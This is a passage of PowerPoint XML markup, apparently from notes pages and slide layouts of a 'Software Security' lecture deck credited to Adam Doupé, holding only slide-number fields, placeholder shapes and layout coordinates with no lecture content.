      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1098754"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098755"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44413132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80F9EE-ABF9-A140-BB1E-40D304745E47}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>238</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1100802"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00803"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31615719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467B9D-9264-1947-AAD4-03521D348AF1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>239</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1102850"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02851"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57420595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989057-93FD-4748-92C7-3F80CD4C490C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>240</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1104898"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04899"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40434223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FF4A43-03A1-884B-83B1-FFFDBE2DF729}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>241</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1106946"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06947"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83307457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857F10-BFF4-5A47-B5D6-A8A176209894}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>243</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227778" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12277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8036934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5315F9-C31A-624A-9D47-E238F8E3A613}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>244</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1228802" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1228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2943641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71631D-F779-1B47-BD13-B0E0DFECE375}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>246</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167362" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11673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25634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121A61-84E2-0240-BA67-5A5A0E89159B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1015810" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10158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8602695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B60457-7160-5149-AD8A-7CCE165DFA80}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>247</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168386" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11683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1570361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5E9AB-E120-0F49-A091-50F81B09CB24}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>249</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229826" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229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702944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E57D3A-5C9C-4249-AAC6-3EF462A4DE19}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>250</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230850" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230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576622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9B691D-35A2-F946-A6E3-133115CC8A10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>251</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231874" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12318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6518062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5C354A9F-5682-3446-838B-97965C79B6DB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>252</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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96900786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9FD702A9-199E-8842-A6BA-D84903D3B018}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>253</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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13106883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DF91307F-3418-3541-9126-02EFF585F244}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>254</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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2908800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A6D0BA-B202-3540-B9FB-0822A7C64046}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>256</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108994"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08995"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5079733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AA579D-E745-7D4E-82EC-FF06259005CF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>257</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111042"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11043"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20971252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C664D2-B5C1-A542-B9CF-3C5D91B08467}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>258</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113090"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13091"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212274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594DB0-638B-B14B-AA4D-B1DCA135860E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1016834" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10168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0120512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E14A5B-7643-634E-98BB-52F566DF0819}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>259</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1115138"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15139"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56564435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55C80E-0050-7440-91DD-7708E9697E53}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>260</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1117186"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17187"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56118041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E00187-1A95-0C46-9504-1272CEE643CE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>261</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1119234"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19235"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89862479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414AD8-3053-A745-B0D6-C3FDBD417992}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>262</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121282"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21283"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81337026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CE6FB4-30E9-CF46-A0C7-F1C271B68F46}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>263</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1123330"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23331"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02256891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CA6099-85F4-F94A-A0F1-153AA6D5F61A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>264</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1125378"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25379"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1083216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890CE1-BA8D-BA4B-80B6-E720D7771979}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>265</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1127426"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27427"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67230689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039116-6842-924A-A7CE-DDA575A70DA5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>266</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1129474" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="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1129475"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56695924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DECC22-AED7-3646-BB4B-243DD2E9150E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>267</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189890" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11898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982759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B6693F-A9C2-A34A-8B75-C92F0DF93E52}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>268</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1131522"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31523"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282410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0FB2D7-A42A-8D4B-9DED-F972C34B7F5D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017858" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10178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8778039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3589DC-D40D-5949-BE5B-363D7E189410}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>269</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135618"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35619"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13488079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05C357-9C52-F04C-BE02-F248699357F5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>270</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1137666"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37667"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09394997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A35D9F-8422-9440-B1EF-ECDD725363A8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>271</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1139714"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39715"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54638021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4C16C8-F92F-3F4D-B118-51C6788CC8FE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>272</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141762"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41763"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3505038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2738CF-359D-EE46-A2FE-507409A27A82}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>273</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1143810"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43811"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31761408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2C6258-C9B7-384F-9C48-758DC5D2FE42}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>274</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145858"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45859"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35346748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277F35-681B-AE48-960D-5318E45B4E4E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>275</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1180674"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80675"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77542176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08FC63-C28E-DE42-8F74-1EF2A7D0EDF3}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>276</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1172482"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72483"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82452558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1E8060-D11E-9F46-BEB7-5BB3173F4724}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>277</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174530"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74531"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4258742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1311B3-679B-A842-A2C9-00D1801F6399}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>278</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1176578"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76579"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525700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a:xfrm>
            <a:off x="6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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180802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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="3619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513187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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="3619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192767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447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1752600"/>
            <a:ext cx="4267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752600"/>
            <a:ext cx="4267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8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1E546586-0967-264B-9B68-19633807768E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1500151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447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Table Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1752600"/>
            <a:ext cx="8686800" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6533B83B-44E4-484B-85B6-9FCF77BE0DAA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1645427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447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1752600"/>
            <a:ext cx="4267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4267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8458200" y="6400800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{FEE62F38-8D23-B74E-AB9B-1D546E6113A9}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1391466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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="3891776"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dirty="0"/>
              <a:t>Adam Doupé, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0"/>
              <a:t> Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2173440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6524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D7E63A33-8271-4DD0-9C48-789913D7C115}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1926531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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281431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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200506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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="3619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608991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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="3619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861552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24017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2754ED01-E2A0-4C1E-8E21-014B99041579}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="3619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094290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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="3619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441380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186"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8242300" y="6356353"/>
            <a:ext cx="444500" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
